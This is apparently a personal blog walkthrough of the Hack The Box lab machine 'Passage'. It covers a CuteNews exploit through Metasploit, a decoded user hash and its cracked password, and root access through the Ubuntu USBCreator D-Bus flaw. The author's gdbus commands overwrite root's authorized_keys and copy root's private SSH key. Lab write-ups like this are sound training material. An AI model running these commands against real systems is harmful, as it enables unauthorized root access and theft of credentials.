Passage HTB walk-through.

Hey everyone this is a walk-through of a HTB machine name passage.

BASIC Details

IP=> 10.10.10.206

type=> linux

level =>Medium

=> lets directly jump into it with out any wait 😉.

So, lets do an NMAP scan so that we can know what are the ports available.

# Nmap 7.80 scan initiated Sun Sep  6 09:18:38 2020 as: nmap -sC -sV -oN nmap.txt 10.10.10.206
Nmap scan report for 10.10.10.206
Host is up (0.062s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
| 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 6 09:18:52 2020 -- 1 IP address (1 host up) scanned in 14.43 seconds

from the scan we got to know there are two ports open which are PORT 22 (SSH) and PORT 80 (HTTP). lets check out the http port and find weather we can do any thing. Before that I had added the ip to hosts (`sudo nano /etc/hosts`) .

so enumerating the http I found out an interesting thing which says “powered by CuteNews”.

bottom its written as powered by CuteNews

So I quickly searched for exploits related to CuteNews and found out these:-

=> https://www.exploit-db.com/exploits/46698

=>https://www.exploit-db.com/exploits/48458

As the first exploit is based on metasploit I had downloaded it and added it to metasploit but form the options I got to know this needs a username and password to exploit the CVE.

so for the user name i had started digging deeper on website and on “/CuteNews” I found a login page.

So from the register I had registered some fake username and password.

I had created a user with name shark and password shark so lets try weather we can pop a Meterpreter shell from it. Before exploiting lets set up the username and password to the exploit.

so what are we waiting for?? ha lets gooo and exploit and hope for a shell.

ha boom we got a Meterpreter shell. it was easy right, isn't it?

so lets quickly get a normal shell using command “shell” and stable it using

python -c "import pty; pty.spawn('/bin/bash')";

so here we go with a web shell. now its time to get an user shell so lets enumerate and find weather we can get something.

so here i got some wired data at `/var/www/html/CuteNews/cdata/users/lines` as these looks like base64 strings i started to decode them. I found this

┌─[shark@shark]─[~/Desktop/HTB/passage]
└──╼ $echo "YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19" | base64 -d
a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}

there was a user details with name paul and hash of password “e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd”

With the help of crackstaion.net I could easily decode the hash and find the password.

so we got the username and password.

user: paul
password: atlanta1

so lets switch the user and get user-flag 😉

BHOM 🔥 user was easy peasy.

now its time to root. I had checked weather paul has any permisions but unluckily he had nothing. further I started checking the knownhosts and found there was a user running on local host and I moved into that user to find out weather I can find any lead for root.

Then for quick enumeration I started to look into services available on it.Using command ps -ef. This gave me a lot data but my eye got to a specific services.

nadav 1035 948 0 07:05 ? 00:00:00 dbus-daemon --fork --session --address=unix:abstract=/tmp/dbus-NRa7gyxdk0

I had started searching for privilage escalation with dbus and found an ver intresting article

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

form the article I crafted some payloads which allows you to get the root flag.

Payload1:- this allows you to add the id_rsa to authorized_keys of root.

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/paul/.ssh/id_rsa /root/.ssh/authorized_key true

payload2:- copying the id_rsa of root to user

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true

there you go root flag 🔥.

Hope you liked the journey :) improvements and comments are highly apprised.

A creative individual,opportunity hunter!,CTF player, weekly blogger